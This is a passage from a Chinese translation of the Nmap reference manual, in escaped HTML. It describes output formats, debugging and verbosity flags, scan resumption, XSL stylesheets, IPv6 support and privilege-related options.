\u7528\u4e8e\u5728\u547d\u4ee4\u884c\u4e0a\u8fdb\u884c\u4e00\u6b21\u6027\u6d4b\u5f0f\u3002\u67e5\u627essh\u7aef\u53e3\u6253\u5f00\u6216\u8fd0\u884cSloaris\u7684\u4e3b\u673a\uff0c\u53ea\u9700 \u8981\u4e00\u4e2a\u7b80\u5355\u7684grep\u4e3b\u673a\u8bf4\u660e\uff0c\u4f7f\u7528\u901a\u9053\u5e76\u901a\u8fc7awk\u6216cut\u547d\u4ee4\u6253\u5370\u6240\u9700\u7684\u57df\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Grep\u8f93\u51fa\u53ef\u4ee5\u5305\u542b\u6ce8\u91ca(\u6bcf\u884c\u7531#\u53f7\u5f00\u59cb)\u3002\u6bcf\u884c\u75316\u4e2a\u6807\u8bb0\u7684\u57df\u7ec4\u6210\uff0c\u7531\u5236\u8868\u7b26\u53ca \u5192\u53f7\u5206\u9694\u3002\u8fd9\u4e9b\u57df\u6709<code>\u4e3b\u673a<\/code>\uff0c<code>\u7aef\u53e3<\/code>\uff0c&nbsp;<code>\u534f\u8bae<\/code>\uff0c<code>\u5ffd\u7565\u72b6\u6001<\/code>\uff0c&nbsp;<code>\u64cd\u4f5c\u7cfb\u7edf<\/code>\uff0c<code>\u5e8f\u5217\u53f7<\/code>\uff0c&nbsp;<code>IPID<\/code>\u548c<code>\u72b6\u6001<\/code>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e9b\u57df\u4e2d\u6700\u91cd\u8981\u7684\u662f<code>Ports<\/code>\uff0c\u5b83\u63d0\u4f9b \u4e86\u6240\u5173\u6ce8\u7684\u7aef\u53e3\u7684\u7ec6\u8282\uff0c\u7aef\u53e3\u9879\u7531\u9017\u53f7\u5206\u9694\u3002\u6bcf\u4e2a\u7aef\u53e3\u9879\u4ee3\u8868\u4e00\u4e2a\u6240\u5173\u6ce8\u7684\u7aef\u53e3\uff0c \u6bcf\u4e2a\u5b50\u57df\u7531\/\u5206\u9694\u3002\u8fd9\u4e9b\u5b50\u57df\u6709\uff1a<code>\u7aef\u53e3\u53f7<\/code>\uff0c&nbsp;<code>\u72b6\u6001<\/code>\uff0c<code>\u534f\u8bae<\/code>\uff0c&nbsp;<code>\u62e5\u6709\u8005<\/code>\uff0c<code>\u670d\u52a1<\/code>\uff0c&nbsp;<code>SunRPCinfo<\/code>\u548c<code>\u7248\u672c\u4fe1\u606f<\/code>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u4e8eXML\u8f93\u51fa\uff0c\u672c\u624b\u518c\u65e0\u6cd5\u5217\u4e3e\u6240\u6709\u7684\u683c\u5f0f\uff0c\u6709\u5173Nmap Grep\u8f93\u51fa\u7684\u66f4\u8be6\u7ec6\u4fe1\u606f\u53ef \u67e5\u9605<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.unspecific.com\/nmap-oG-output\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.unspecific.com\/nmap-oG-output\" rel=\"nofollow\" >http:\/\/www.unspecific.com\/nmap-oG-output<\/a><\/a>\u3002<code>-oA &lt;basename&gt;<\/code>&nbsp;(\u8f93\u51fa\u81f3\u6240\u6709\u683c\u5f0f)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u4f7f\u7528\u65b9\u4fbf\uff0c\u5229\u7528<code>-oA<em><code>&lt;basename&gt;<\/code><\/em><\/code>\u9009\u9879 \u53ef\u5c06\u626b\u63cf\u7ed3\u679c\u4ee5\u6807\u51c6\u683c\u5f0f\u3001XML\u683c\u5f0f\u548cGrep\u683c\u5f0f\u4e00\u6b21\u6027\u8f93\u51fa\u3002\u5206\u522b\u5b58\u653e\u5728&nbsp;<em><code>&lt;basename&gt;<\/code><\/em>.nmap\uff0c<em><code>&lt;basename&gt;<\/code><\/em>.xml\u548c<em><code>&lt;basename&gt;<\/code><\/em>.gnmap\u6587\u4ef6\u4e2d\u3002\u4e5f\u53ef\u4ee5\u5728\u6587\u4ef6\u540d\u524d \u6307\u5b9a\u76ee\u5f55\u540d\uff0c\u5982\u5728UNIX\u4e2d\uff0c\u4f7f\u7528<code>~\/nmaplogs\/foocorp\/<\/code>\uff0c \u5728Window\u4e2d\uff0c\u4f7f\u7528<code>c:hackingsco<\/code>&nbsp;on Windows\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7ec6\u8282\u548c\u8c03\u8bd5\u9009\u9879<\/strong><code>-v<\/code>&nbsp;(\u63d0\u9ad8\u8f93\u51fa\u4fe1\u606f\u7684\u8be6\u7ec6\u5ea6)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7\u63d0\u9ad8\u8be6\u7ec6\u5ea6\uff0cNmap\u53ef\u4ee5\u8f93\u51fa\u626b\u63cf\u8fc7\u7a0b\u7684\u66f4\u591a\u4fe1\u606f\u3002 \u8f93\u51fa\u53d1\u73b0\u7684\u6253\u5f00\u7aef\u53e3\uff0c\u82e5Nmap\u8ba4\u4e3a\u626b\u63cf\u9700\u8981\u66f4\u591a\u65f6\u95f4\u4f1a\u663e\u793a\u4f30\u8ba1 \u7684\u7ed3\u675f\u65f6\u95f4\u3002\u8fd9\u4e2a\u9009\u9879\u4f7f\u7528\u4e24\u6b21\uff0c\u4f1a\u63d0\u4f9b\u66f4\u8be6\u7ec6\u7684\u4fe1\u606f\u3002\u8fd9\u4e2a\u9009 \u9879\u4f7f\u7528\u4e24\u6b21\u4ee5\u4e0a\u4e0d\u8d77\u4f5c\u7528\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5927\u90e8\u5206\u7684\u53d8\u5316\u4ec5\u5f71\u54cd\u4ea4\u4e92\u5f0f\u8f93\u51fa\uff0c\u4e5f\u6709\u4e00\u4e9b\u5f71\u54cd\u6807\u51c6\u548c\u811a\u672c \u5c0f\u5b50\u8f93\u51fa\u3002\u5176\u5b83\u8f93\u51fa\u7c7b\u578b\u7531\u673a\u5668\u5904\u7406\uff0c\u6b64\u65f6Nmap\u9ed8\u8ba4\u63d0\u4f9b\u8be6\u7ec6\u7684\u4fe1 \u606f\uff0c\u4e0d\u9700\u8981\u4eba\u5de5\u5e72\u9884\u3002\u7136\u800c\uff0c\u5176\u5b83\u6a21\u5f0f\u4e5f\u4f1a\u6709\u4e00\u4e9b\u53d8\u5316\uff0c\u7701\u7565\u4e00\u4e9b \u7ec6\u8282\u53ef\u4ee5\u51cf\u5c0f\u8f93\u51fa\u5927\u5c0f\u3002\u4f8b\u5982\uff0cGrep\u8f93\u51fa\u4e2d\u7684\u6ce8\u91ca\u884c\u63d0\u4f9b\u6240\u6709\u626b\u63cf \u7aef\u53e3\u5217\u8868\uff0c\u4f46\u7531\u4e8e\u8fd9\u4e9b\u4fe1\u606f\u8fc7\u957f\uff0c\u56e0\u6b64\u53ea\u80fd\u5728\u7ec6\u8282\u6a21\u5f0f\u4e2d\u8f93\u51fa\u3002<code>-d [level]<\/code>&nbsp;(\u63d0\u9ad8\u6216\u8bbe\u7f6e\u8c03\u8bd5\u7ea7\u522b)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u8be6\u7ec6\u6a21\u5f0f\u4e5f\u4e0d\u80fd\u4e3a\u7528\u6237\u63d0\u4f9b\u8db3\u591f\u7684\u6570\u636e\u65f6\uff0c\u4f7f\u7528\u8c03\u8bd5\u53ef\u4ee5\u5f97\u5230\u66f4 \u591a\u7684\u4fe1\u606f\u3002\u4f7f\u7528\u7ec6\u8282\u9009\u9879(<code>-v<\/code>)\u65f6\uff0c\u53ef\u542f\u7528\u547d\u4ee4\u884c\u53c2\u6570 (<code>-d<\/code>)\uff0c\u591a\u6b21\u4f7f\u7528\u53ef\u63d0\u9ad8\u8c03\u8bd5\u7ea7\u522b\u3002\u4e5f\u53ef\u5728<code>-d<\/code>\u540e\u9762\u4f7f\u7528\u53c2\u6570\u8bbe\u7f6e\u8c03\u8bd5\u7ea7\u522b\u3002\u4f8b\u5982\uff0c<code>-d9<\/code>\u8bbe\u5b9a\u7ea7\u522b9\u3002\u8fd9\u662f \u6700\u9ad8\u7684\u7ea7\u522b\uff0c\u5c06\u4f1a\u4ea7\u751f\u4e0a\u5343\u884c\u7684\u8f93\u51fa\uff0c\u9664\u975e\u53ea\u5bf9\u5f88\u5c11\u7684\u7aef\u53e3\u548c\u76ee\u6807\u8fdb\u884c\u7b80\u5355\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679cNmap\u56e0\u4e3aBug\u800c\u6302\u8d77\u6216\u8005\u5bf9Nmap\u7684\u5de5\u4f5c\u53ca\u539f\u7406\u6709\u7591\u95ee\uff0c\u8c03\u8bd5\u8f93\u51fa \u975e\u5e38\u6709\u6548\u3002\u4e3b\u8981\u662f\u5f00\u53d1\u4eba\u5458\u7528\u8fd9\u4e2a\u9009\u9879\uff0c\u8c03\u8bd5\u884c\u4e0d\u5177\u5907\u81ea\u6211\u89e3\u91ca\u7684\u7279\u70b9\u3002 \u4f8b\u5982\uff0c<code>Timeoutvals: srtt: -1 rttvar: -1 to: 1000000 delta 14987 ==&gt; srtt: 14987 rttvar: 14987 to: 100000<\/code>\u3002\u5982\u679c\u5bf9\u67d0\u884c\u8f93\u51fa\u4e0d\u660e\u767d\uff0c \u53ef\u4ee5\u5ffd\u7565\u3001\u67e5\u770b\u6e90\u4ee3\u7801\u6216\u5411\u5f00\u53d1\u5217\u8868(nmap-dev)\u6c42\u52a9\u3002\u6709\u4e9b\u8f93\u51fa\u884c\u4f1a\u6709\u81ea \u6211\u89e3\u91ca\u7684\u7279\u70b9\uff0c\u4f46\u968f\u7740\u8c03\u8bd5\u7ea7\u522b\u7684\u5347\u9ad8\uff0c\u4f1a\u8d8a\u6765\u8d8a\u542b\u7cca\u3002<code>--packet-trace<\/code>&nbsp;(\u8ddf\u8e2a\u53d1\u9001\u548c\u63a5\u6536\u7684\u62a5\u6587)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42Nmap\u6253\u5370\u53d1\u9001\u548c\u63a5\u6536\u7684\u6bcf\u4e2a\u62a5\u6587\u7684\u6458\u8981\uff0c\u901a\u5e38\u7528\u4e8e \u8c03\u8bd5\uff0c\u6709\u52a9\u4e8e\u65b0\u7528\u6237\u66f4\u597d\u5730\u7406\u89e3Nmap\u7684\u771f\u6b63\u5de5\u4f5c\u3002\u4e3a\u907f\u514d\u8f93\u51fa\u8fc7 \u591a\u7684\u884c\uff0c\u53ef\u4ee5\u9650\u5236\u626b\u63cf\u7684\u7aef\u53e3\u6570\uff0c\u5982<code>-p20-30<\/code>\u3002 \u5982\u679c\u53ea\u9700\u8fdb\u884c\u7248\u672c\u68c0\u6d4b\uff0c\u4f7f\u7528<code>--version-trace<\/code>\u3002<code>--iflist<\/code>&nbsp;(\u5217\u4e3e\u63a5\u53e3\u548c\u8def\u7531)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8f93\u51faNmap\u68c0\u6d4b\u5230\u7684\u63a5\u53e3\u5217\u8868\u548c\u7cfb\u7edf\u8def\u7531\uff0c\u7528\u4e8e\u8c03\u8bd5\u8def\u7531 \u95ee\u9898\u6216\u8bbe\u5907\u63cf\u8ff0\u5931\u8bef(\u5982Nmap\u628aPPP\u8fde\u63a5\u5f53\u4f5c\u4ee5\u592a\u7f51\u5bf9\u5f85)\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>\u5176\u5b83\u8f93\u51fa\u9009\u9879<\/strong><code>--append-output<\/code>&nbsp;(\u5728\u8f93\u51fa\u6587\u4ef6\u4e2d\u6dfb\u52a0)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5f53\u4f7f\u7528\u6587\u4ef6\u4f5c\u4e3a\u8f93\u51fa\u683c\u5f0f\uff0c\u5982<code>-oX<\/code>\u6216<code>-oN<\/code>\uff0c \u9ed8\u8ba4\u8be5\u6587\u4ef6\u88ab\u8986\u76d6\u3002\u5982\u679c\u5e0c\u671b\u6587\u4ef6\u4fdd\u7559\u73b0\u6709\u5185\u5bb9\uff0c\u5c06\u7ed3\u679c\u6dfb\u52a0\u5728\u73b0 \u6709\u6587\u4ef6\u540e\u9762\uff0c\u4f7f\u7528<code>--append-output<\/code>\u9009\u9879\u3002\u6240\u6709\u6307 \u5b9a\u7684\u8f93\u51fa\u6587\u4ef6\u90fd\u88ab\u6dfb\u52a0\u3002\u4f46\u5bf9\u4e8eXML(<code>-oX<\/code>)\u626b\u63cf\u8f93\u51fa \u6587\u4ef6\u65e0\u6548\uff0c\u65e0\u6cd5\u6b63\u5e38\u89e3\u6790\uff0c\u9700\u8981\u624b\u5de5\u4fee\u6539\u3002<code>--resume &lt;filename&gt;<\/code>&nbsp;(\u7ee7\u7eed\u4e2d\u65ad\u7684\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u4e9b\u6269\u5c55\u7684Nmap\u8fd0\u884c\u9700\u8981\u5f88\u957f\u7684\u65f6\u95f4 -- \u4ee5\u5929\u8ba1\u7b97\uff0c\u8fd9\u7c7b\u626b\u63cf \u5f80\u5f80\u4e0d\u4f1a\u7ed3\u675f\u3002\u53ef\u4ee5\u8fdb\u884c\u4e00\u4e9b\u9650\u5236\uff0c\u7981\u6b62Nmap\u5728\u5de5\u4f5c\u65f6\u95f4\u8fd0\u884c\uff0c\u5bfc\u81f4 \u7f51\u7edc\u4e2d\u65ad\u3001\u8fd0\u884cNmap\u7684\u4e3b\u673a\u8ba1\u5212\u6216\u975e\u8ba1\u5212\u5730\u91cd\u542f\u3001\u6216\u8005Nmap\u81ea\u5df1\u4e2d\u65ad\u3002 \u8fd0\u884cNmap\u7684\u7ba1\u7406\u5458\u53ef\u4ee5\u56e0\u5176\u5b83\u539f\u56e0\u53d6\u6d88\u8fd0\u884c\uff0c\u6309\u4e0b<strong>ctrl-C<\/strong>&nbsp;\u5373\u53ef\u3002\u4ece\u5934\u5f00\u59cb\u542f\u52a8\u626b\u63cf\u53ef\u80fd\u4ee4\u4eba\u4e0d\u5feb\uff0c\u5e78\u8fd0\u7684\u662f\uff0c\u5982\u679c\u6807\u51c6\u626b\u63cf (<code>-oN<\/code>)\u6216Grep\u626b\u63cf(<code>-oG<\/code>)\u65e5\u5fd7 \u88ab\u4fdd\u7559\uff0c\u7528\u6237\u53ef\u4ee5\u8981\u6c42Nmap\u6062\u590d\u7ec8\u6b62\u7684\u626b\u63cf\uff0c\u53ea\u9700\u8981\u7b80\u5355\u5730\u4f7f\u7528\u9009\u9879&nbsp;<code>--resume<\/code>\u5e76\u8bf4\u660e\u6807\u51c6\/Grep\u626b\u63cf\u8f93\u51fa\u6587\u4ef6\uff0c\u4e0d\u5141\u8bb8 \u4f7f\u7528\u5176\u5b83\u53c2\u6570\uff0cNmap\u4f1a\u89e3\u6790\u8f93\u51fa\u6587\u4ef6\u5e76\u4f7f\u7528\u539f\u6765\u7684\u683c\u5f0f\u8f93\u51fa\u3002\u4f7f\u7528\u65b9\u5f0f \u5982<strong>nmap --resume&nbsp;<em><code>&lt;logfilename&gt;<\/code><\/em><\/strong>\u3002 Nmap\u5c06\u628a\u65b0\u5730\u7ed3\u679c\u6dfb\u52a0\u5230\u6587\u4ef6\u4e2d\uff0c\u8fd9\u79cd\u65b9\u5f0f\u4e0d\u652f\u6301XML\u8f93\u51fa\u683c\u5f0f\uff0c\u539f\u56e0\u662f \u5c06\u4e24\u6b21\u8fd0\u884c\u7ed3\u679c\u5408\u5e76\u81f3\u4e00\u4e2aXML\u6587\u4ef6\u6bd4\u8f83\u56f0\u96be\u3002<code>--stylesheet &lt;path or URL&gt;<\/code>&nbsp;(\u8bbe\u7f6eXSL\u6837\u5f0f\u8868\uff0c\u8f6c\u6362XML\u8f93\u51fa)<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u63d0\u4ece\u4e86XSL\u6837\u5f0f\u8868<code>nmap.xsl<\/code>\uff0c\u7528\u4e8e\u67e5\u770b \u6216\u8f6c\u6362XML\u8f93\u51fa\u81f3HTML\u3002XML\u8f93\u51fa\u5305\u542b\u4e86\u4e00\u4e2a<code>xml-stylesheet<\/code>\uff0c \u76f4\u63a5\u6307\u5411<code>nmap.xml<\/code>\u6587\u4ef6\uff0c \u8be5\u6587\u4ef6\u7531Nmap\u5b89\u88c5(\u6216\u4f4d\u4e8eWindows\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55)\u3002\u5728Web\u6d4f\u89c8\u5668 \u4e2d\u6253\u5f00Nmap\u7684XML\u8f93\u51fa\u65f6\uff0c\u5c06\u4f1a\u5728\u6587\u4ef6\u7cfb\u7edf\u4e2d\u5bfb\u627e<code>nmap.xsl<\/code>\u6587\u4ef6\uff0c \u5e76\u4f7f\u7528\u5b83\u8f93\u51fa\u7ed3\u679c\u3002\u5982\u679c\u5e0c\u671b\u4f7f\u7528\u4e0d\u540c\u7684\u6837\u5f0f\u8868\uff0c\u5c06\u5b83\u4f5c\u4e3a&nbsp;<code>--stylesheet<\/code>\u7684\u53c2\u6570\uff0c\u5fc5\u6bb5\u6307\u660e\u5b8c\u6574\u7684\u8def \u5f84\u6216URL\uff0c\u5e38\u89c1\u7684\u8c03\u7528\u65b9\u5f0f\u662f<code>--stylesheet <a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/data\/nmap.xsl\" rel=\"nofollow\" >http:\/\/www.insecure.org\/nmap\/data\/nmap.xsl<\/a><\/code>\u3002 \u8fd9\u544a\u8bc9\u6d4f\u89c8\u5668\u4eceInsecire.Org\u4e2d\u52a0\u8f7d\u6700\u65b0\u7684\u6837\u5f0f\u8868\u3002\u8fd9\u4f7f\u5f97 \u6ca1\u5b89\u88c5Nmap(\u548c<code>nmap.xsl<\/code>) \u7684\u673a\u5668\u4e2d\u53ef\u4ee5\u65b9\u4fbf\u5730\u67e5\u770b\u7ed3\u679c\u3002\u56e0\u6b64\uff0cURL\u66f4\u65b9\u4fbf\u4f7f\u7528\uff0c\u672c\u5730\u6587\u4ef6\u7cfb\u7edf \u7684nmap.xsl\u7528\u4e8e\u9ed8\u8ba4\u65b9\u5f0f\u3002<code>--no-stylesheet<\/code>&nbsp;(\u5ffd\u7565XML\u58f0\u660e\u7684XSL\u6837\u5f0f\u8868)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u8be5\u9009\u9879\u7981\u6b62Nmap\u7684XML\u8f93\u51fa\u5173\u8054\u4efb\u4f55XSL\u6837\u5f0f\u8868\u3002&nbsp;<code>xml-stylesheet<\/code>\u6307\u793a\u88ab\u5ffd\u7565\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u5176\u5b83\u9009\u9879<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u672c\u8282\u63cf\u8ff0\u4e00\u4e9b\u91cd\u8981\u7684(\u548c\u5e76\u4e0d\u91cd\u8981)\u7684\u9009\u9879\uff0c\u8fd9\u4e9b\u9009\u9879 \u4e0d\u9002\u5408\u5176\u5b83\u4efb\u4f55\u5730\u65b9\u3002<code>-6<\/code>&nbsp;(\u542f\u7528IPv6\u626b\u63cf)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4ece2002\u5e74\u8d77\uff0cNmap\u63d0\u4f9b\u5bf9IPv6\u7684\u4e00\u4e9b\u4e3b\u8981\u7279\u5f81\u7684\u652f\u6301\u3002ping\u626b\u63cf(TCP-only)\u3001 \u8fde\u63a5\u626b\u63cf\u4ee5\u53ca\u7248\u672c\u68c0\u6d4b\u90fd\u652f\u6301IPv6\u3002\u9664\u589e\u52a0<code>-6<\/code>\u9009\u9879\u5916\uff0c \u5176\u5b83\u547d\u4ee4\u8bed\u6cd5\u76f8\u540c\u3002\u5f53\u7136\uff0c\u5fc5\u987b\u4f7f\u7528IPv6\u5730\u5740\u6765\u66ff\u6362\u4e3b\u673a\u540d\uff0c\u5982&nbsp;<code>3ffe:7501:4819:2000:210:f3ff:fe03:14d0<\/code>\u3002 \u9664\u201c\u6240\u5173\u6ce8\u7684\u7aef\u53e3\u201d\u884c\u7684\u5730\u5740\u90e8\u5206\u4e3aIPv6\u5730\u5740\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">IPv6\u76ee\u524d\u672a\u5728\u5168\u7403\u5e7f\u6cdb\u91c7\u7528\uff0c\u76ee\u524d\u5728\u4e00\u4e9b\u56fd\u5bb6(\u4e9a\u6d32)\u5e94\u7528\u8f83\u591a\uff0c \u4e00\u4e9b\u9ad8\u7ea7\u64cd\u4f5c\u7cfb\u7edf\u652f\u6301IPv6\u3002\u4f7f\u7528Nmap\u7684IPv6\u529f\u80fd\uff0c\u626b\u63cf\u7684\u6e90\u548c\u76ee \u7684\u90fd\u9700\u8981\u914d\u7f6eIPv6\u3002\u5982\u679cISP(\u5927\u90e8\u5206)\u4e0d\u5206\u914dIPv6\u5730\u5740\uff0cNmap\u53ef\u4ee5\u91c7\u7528 \u514d\u8d39\u7684\u96a7\u9053\u4ee3\u7406\u3002\u4e00\u79cd\u8f83\u597d\u7684\u9009\u62e9\u662fBT Exact\uff0c\u4f4d\u4e8ehttps:\/\/tb.ipv6.btexact.com\/\u3002 \u6b64\u5916\uff0c\u8fd8\u6709Hurricane Electric\uff0c\u4f4d\u4e8e<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/ipv6tb.he.net\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/ipv6tb.he.net\/\" rel=\"nofollow\" >http:\/\/ipv6tb.he.net\/<\/a><\/a>\u30026to4\u96a7\u9053\u662f \u53e6\u4e00\u79cd\u5e38\u7528\u7684\u514d\u8d39\u65b9\u6cd5\u3002<strong><code>-A<\/code>&nbsp;(\u6fc0\u70c8\u626b\u63cf\u6a21\u5f0f\u9009\u9879)<\/strong><\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e2a\u9009\u9879\u542f\u7528\u989d\u5916\u7684\u9ad8\u7ea7\u548c\u9ad8\u5f3a\u5ea6\u9009\u9879\uff0c\u76ee\u524d\u8fd8\u672a\u786e\u5b9a\u4ee3\u8868 \u7684\u5185\u5bb9\u3002\u76ee\u524d\uff0c\u8fd9\u4e2a\u9009\u9879\u542f\u7528\u4e86\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b(<code>-O<\/code>) \u548c\u7248\u672c\u626b\u63cf(<code>-sV<\/code>)\uff0c\u4ee5\u540e\u4f1a\u589e\u52a0\u66f4\u591a\u7684\u529f\u80fd\u3002 \u76ee\u7684\u662f\u542f\u7528\u4e00\u4e2a\u5168\u9762\u7684\u626b\u63cf\u9009\u9879\u96c6\u5408\uff0c\u4e0d\u9700\u8981\u7528\u6237\u8bb0\u5fc6\u5927\u91cf\u7684 \u9009\u9879\u3002\u8fd9\u4e2a\u9009\u9879\u4ec5\u4ec5\u542f\u7528\u529f\u80fd\uff0c\u4e0d\u5305\u542b\u7528\u4e8e\u53ef\u80fd\u6240\u9700\u8981\u7684 \u65f6\u95f4\u9009\u9879(\u5982<code>-T4<\/code>)\u6216\u7ec6\u8282\u9009\u9879(<code>-v<\/code>)\u3002<code>--datadir &lt;directoryname&gt;<\/code>&nbsp;(\u8bf4\u660e\u7528\u6237Nmap\u6570\u636e\u6587\u4ef6\u4f4d\u7f6e)<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u5728\u8fd0\u884c\u65f6\u4ece\u6587\u4ef6\u4e2d\u83b7\u5f97\u7279\u6b8a\u7684\u6570\u636e\uff0c\u8fd9\u4e9b\u6587\u4ef6\u6709&nbsp;<code>nmap-service-probes<\/code>\uff0c&nbsp;<code>nmap-services<\/code>\uff0c&nbsp;<code>nmap-protocols<\/code>\uff0c&nbsp;<code>nmap-rpc<\/code>\uff0c&nbsp;<code>nmap-mac-prefixes<\/code>\u548c&nbsp;<code>nmap-os-fingerprints<\/code>\u3002Nmap\u9996\u5148 \u5728<code>--datadir<\/code>\u9009\u9879\u8bf4\u660e\u7684\u76ee\u5f55\u4e2d\u67e5\u627e\u8fd9\u4e9b\u6587\u4ef6\u3002 \u672a\u627e\u5230\u7684\u6587\u4ef6\uff0c\u5c06\u5728BMAPDIR\u73af\u5883\u53d8\u91cf\u8bf4\u660e\u7684\u76ee\u5f55\u4e2d\u67e5\u627e\u3002 \u63a5\u4e0b\u6765\u662f\u7528\u4e8e\u771f\u6b63\u548c\u6709\u6548UID\u7684<code>~\/.nmap<\/code>&nbsp;\u6216Nmap\u53ef\u6267\u884c\u4ee3\u7801\u7684\u4f4d\u7f6e(\u4ec5Win32)\uff1b\u7136\u540e\u662f\u662f\u7f16\u8bd1\u4f4d\u7f6e\uff0c \u5982<code>\/usr\/local\/share\/nmap<\/code>&nbsp;\u6216<code>\/usr\/share\/nmap<\/code>\u3002 Nmap\u67e5\u627e\u7684\u6700\u540e\u4e00\u4e2a\u4f4d\u7f6e\u662f\u5f53\u524d\u76ee\u5f55\u3002<code>--send-eth<\/code>&nbsp;(\u4f7f\u7528\u539f\u4ee5\u592a\u7f51\u5e27\u53d1\u9001)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42Nmap\u5728\u4ee5\u592a\u7f51(\u6570\u636e\u94fe\u8def)\u5c42\u800c\u4e0d\u662fIP(\u7f51\u7edc\u5c42)\u53d1\u9001 \u62a5\u6587\u3002\u9ed8\u8ba4\u65b9\u5f0f\u4e0b\uff0cNmap\u9009\u62e9\u6700\u9002\u5408\u5176\u8fd0\u884c\u5e73\u53f0\u7684\u65b9\u5f0f\uff0c\u539f\u5957\u63a5 \u5b57(IP\u5c42)\u662fUNIX\u4e3b\u673a\u6700\u6709\u6548\u7684\u65b9\u5f0f\uff0c\u800c\u4ee5\u592a\u7f51\u5e27\u6700\u9002\u5408Windows\u64cd\u4f5c \u7cfb\u7edf\uff0c\u56e0\u4e3aMicrosoft\u7981\u7528\u4e86\u539f\u5957\u63a5\u5b57\u652f\u6301\u3002\u5728UNIX\u4e2d\uff0c\u5982\u679c\u6ca1\u6709\u5176 \u5b83\u9009\u62e9(\u5982\u65e0\u4ee5\u592a\u7f51\u8fde\u63a5)\uff0c\u4e0d\u7ba1\u662f\u5426\u6709\u8be5\u9009\u9879\uff0cNmap\u90fd\u4f7f\u7528\u539fIP\u5305\u3002<code>--send-ip<\/code>&nbsp;(\u5728\u539fIP\u5c42\u53d1\u9001)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42Nmap\u901a\u8fc7\u539fIP\u5957\u63a5\u5b57\u53d1\u9001\u62a5\u6587\uff0c\u800c\u4e0d\u662f\u4f4e\u5c42\u7684\u4ee5 \u592a\u7f51\u5e27\u3002\u8fd9\u662f<code>--send-eth<\/code>\u9009\u9879\u7684\u8865\u5145\u3002<code>--privileged<\/code>&nbsp;(\u5047\u5b9a\u7528\u6237\u5177\u6709\u5168\u90e8\u6743\u9650)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u544a\u8bc9Nmap\u5047\u5b9a\u5176\u5177\u6709\u8db3\u591f\u7684\u6743\u9650\u8fdb\u884c\u6e90\u5957\u63a5\u5b57\u5305\u53d1\u9001\u3001 \u62a5\u6587\u6355\u83b7\u548c\u7c7b\u4f3cUNIX\u7cfb\u7edf\u4e2d\u6839\u7528\u6237\u64cd\u4f5c\u7684\u6743\u9650\u3002\u9ed8\u8ba4\u72b6\u6001\u4e0b\uff0c \u5982\u679c\u7531getuid()\u8bf7\u6c42\u7684\u7c7b\u4f3c\u64cd\u4f5c\u4e0d\u4e3a0\uff0cNmap\u5c06\u9000\u51fa\u3002&nbsp;<code>--privileged<\/code>\u5728\u5177\u6709Linux\u5185\u6838\u6027\u80fd\u7684\u7c7b\u4f3c \u7cfb\u7edf\u4e2d\u4f7f\u7528\u975e\u5e38\u6709\u6548\uff0c\u8fd9\u4e9b\u7cfb\u7edf\u914d\u7f6e\u5141\u8bb8\u975e\u7279\u6743\u7528\u6237\u53ef\u4ee5\u8fdb\u884c \u539f\u62a5\u6587\u626b\u63cf\u3002\u9700\u8981\u660e\u786e\u7684\u662f\uff0c\u5728\u5176\u5b83\u9009\u9879\u4e4b\u524d\u4f7f\u7528\u8fd9\u4e9b\u9700\u8981\u6743 \u9650\u7684\u9009\u9879(SYN\u626b\u63cf\u3001\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b\u7b49)\u3002Nmap-PRIVILEGED\u53d8\u91cf \u8bbe\u7f6e\u7b49\u4ef7\u4e8e<code>--privileged<\/code>\u9009\u9879\u3002<code>-V<\/code>;&nbsp;<code>--version<\/code>&nbsp;(\u6253\u5370\u7248\u672c\u4fe1\u606f)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5370Nmap\u7248\u672c\u53f7\u5e76\u9000\u51fa\u3002<code>-h<\/code>;&nbsp;<code>--help<\/code>&nbsp;(\u6253\u5370\u5e2e\u52a9\u6458\u8981\u9762)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6253\u5370\u4e00\u4e2a\u77ed\u7684\u5e2e\u52a9\u5c4f\u5e55\uff0c\u5217\u51fa\u5927\u90e8\u5206\u5e38\u7528\u7684 \u547d\u4ee4\u9009\u9879\uff0c\u8fd9\u4e2a\u529f\u80fd\u4e0e\u4e0d\u5e26\u53c2\u6570\u8fd0\u884cNmap\u662f\u76f8\u540c\u7684\u3002<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u5b9e\u4f8b<\/h1>\n\n\n<p 